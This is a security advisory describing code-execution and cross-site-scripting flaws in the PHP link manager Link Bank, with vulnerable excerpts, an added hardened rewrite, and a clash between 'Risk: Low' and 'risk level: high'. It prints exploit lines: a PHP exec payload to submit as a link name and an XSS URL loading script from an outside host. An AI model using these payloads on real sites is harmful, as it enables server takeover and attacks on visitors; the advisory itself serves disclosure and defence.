Link Bank code execution and XSS

2006.03.08
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Required access: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

summary

software: Link Bank
vendor's website: http://daverave.64digits.com/index.php?page=linkbank
versions: n/a
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: high

description

Link Bank does not sanitise POST data submitted to it, allowing users to insert data that can be used maliciously. After it is submitted, the data goes to a .txt file which the application reads and executes to display the submitted links. In addition, it is vulnerable to XSS because the application again does not sanitise the variable.

in ./content/index.txt:

    <?php
    include("links.txt");
    ?>

in ./content/add_link.txt:

    $url_name = $_REQUEST['url_name'];
    $url = $_REQUEST['url'];
    $img = $_REQUEST['img'];
    $filename = "content/links.txt";
    $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";

in ./iframe.php:

    <title>Link Bank - <?php echo"$site";?></title>

exploit(s)

code execution: submit something like <?php exec($cmd) ?> as a link name

xss: http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

credit

author(s): retard
email: retard (at) 30gigs (dot) com
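
The three excerpts above share one root cause: request data reaches a sink (a file that is later include()d, an href, the <title> element) without validation or output encoding. A hardened counterpart follows as an added example; it is not Link Bank's code or a vendor patch, and the function names and the one-JSON-object-per-line storage format are assumptions.

```php
<?php
// Added example, not Link Bank's code. Function names and the storage
// format (one JSON object per line) are assumptions for illustration.

// Escape a value for HTML text and quoted attribute values.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only absolute http(s) URLs.
function valid_link_url(string $url): bool {
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Store the submission as inert data, not as generated markup or PHP.
function add_link(string $file, string $name, string $url): bool {
    if ($name === '' || !valid_link_url($url)) {
        return false;
    }
    // JSON_HEX_TAG writes < and > as \u003C / \u003E, so no PHP open tag lands on disk.
    $json = json_encode(['name' => $name, 'url' => $url], JSON_HEX_TAG);
    if ($json === false) {
        return false; // e.g. invalid UTF-8 in the input
    }
    return file_put_contents($file, $json . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// Read the file as data (never include() it) and escape on output.
function render_links(string $file): string {
    $html = '';
    $lines = is_file($file) ? (file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: []) : [];
    foreach ($lines as $line) {
        $row = json_decode($line, true);
        if (!is_array($row) || !is_string($row['name'] ?? null) || !is_string($row['url'] ?? null)) {
            continue; // skip malformed rows
        }
        $href = 'iframe.php?site=' . rawurlencode($row['url']);
        $html .= '<a href="' . h($href) . '" target="_blank" rel="noopener">' . h($row['name']) . "</a><br>\n";
    }
    return $html;
}

// iframe.php: escape the request parameter before it reaches <title>.
function page_title(string $site): string {
    return '<title>Link Bank - ' . h($site) . '</title>';
}
```

If iframe.php also loads the site parameter into a frame, the same valid_link_url() check belongs there before the value is used.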



Copyright 2024, cxsecurity.com

 
